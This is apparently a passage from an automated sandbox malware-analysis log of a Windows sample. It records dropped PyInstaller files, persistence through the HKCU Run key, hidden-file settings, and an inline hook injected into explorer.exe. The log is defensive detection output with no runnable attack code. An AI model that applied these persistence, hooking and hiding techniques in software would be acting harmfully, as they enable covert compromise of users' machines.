              Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607206409.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-synch-l1-2-0.dll.12.dr
              Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605956547.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604669158.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1608235922.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\python38.pdb source: 21AB.tmp.zx.exe, 0000000D.00000002.1631752112.00007FFBAAE7D000.00000002.00000001.01000000.0000000C.sdmp
              Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610124454.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\_lzma.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1604206819.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605640873.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606311059.0000021D1F5A1000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605846257.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611918910.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606809485.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1607729908.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1606922801.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-string-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605173726.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1610339466.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605543300.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.12.dr
              Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1605445250.0000021D1F5A0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\21\b\bin\amd64\unicodedata.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1617571162.0000021D1F5AB000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1609596519.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: 21AB.tmp.zx.exe, 0000000C.00000003.1611567066.0000021D1F5A2000.00000004.00000020.00020000.00000000.sdmp
              Source: F72F.tmp.ssg.exe.5.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83C14EC LoadLibraryA,GetProcAddress,0_2_00007FF7E83C14EC
              Source: uFVgJVXaEU.exeStatic PE information: section name: .x64
              Source: 2F409E82DCA61388941053.exe.0.drStatic PE information: section name: .x64
              Source: 2D25.tmp.update.exe.5.drStatic PE information: section name: .x64
              Source: libcrypto-1_1.dll.12.drStatic PE information: section name: .00cfg
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83CEA11 push rcx; iretd 0_2_00007FF7E83CEA12
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83CE812 push rbp; iretd 0_2_00007FF7E83CE813
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83CE9B3 push 00000041h; ret 0_2_00007FF7E83CE9C4
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeCode function: 0_2_00007FF7E83CE9A9 push rbp; iretd 0_2_00007FF7E83CE9AA
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6DE9B3 push 00000041h; ret 3_2_00007FF67E6DE9C4
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6DE9A9 push rbp; iretd 3_2_00007FF67E6DE9AA
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6DE812 push rbp; iretd 3_2_00007FF67E6DE813
              Source: C:\Windows\System32\svchost.exeCode function: 3_2_00007FF67E6DEA11 push rcx; iretd 3_2_00007FF67E6DEA12
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0408 push rbp; retf 5_2_0DFD039B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE07C0 push rbp; retf 5_2_0DFE07C3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE07A8 push rbp; retf 5_2_0DFE07AB
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE0750 push rdi; retf 5_2_0DFE0763
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE0738 push rbp; retf 5_2_0DFE0743
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE0710 push rsi; retf 5_2_0DFE0713
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE0710 push rdi; retf 5_2_0DFE075B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01F8 push rsi; retf 5_2_0DFD01FB
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01F0 push r14; retf 5_2_0DFD01F3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01E8 push r14; retf 5_2_0DFD01EB
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01E0 push rsi; retf 5_2_0DFD01E3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01C0 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01C0 push r14; retf 5_2_0DFD01D3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01B8 push r14; retf 5_2_0DFD01D3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD01A0 push rbp; retf 5_2_0DFD01A3
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0198 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0190 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0180 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0178 push rbp; retf 5_2_0DFD017B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0170 push rsi; retf 5_2_0DFD0173
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFE0970 push r14; retf 5_2_0DFE0973
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0168 push rbp; retf 5_2_0DFD016B
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFD0168 push rbp; retf 5_2_0DFD019B
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\libffi-7.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\VCRUNTIME140.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeFile created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ServicesJump to behavior

              Hooking and other Techniques for Hiding and Protection

              barindex
              Changes the view of files in windows explorer (hidden files and folders)
              Source: C:\Windows\System32\audiodg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced HiddenJump to behavior
              Modifies the prolog of user mode functions (user mode inline hooks)
              Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5D
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA50E0 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,5_2_0DFA50E0
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
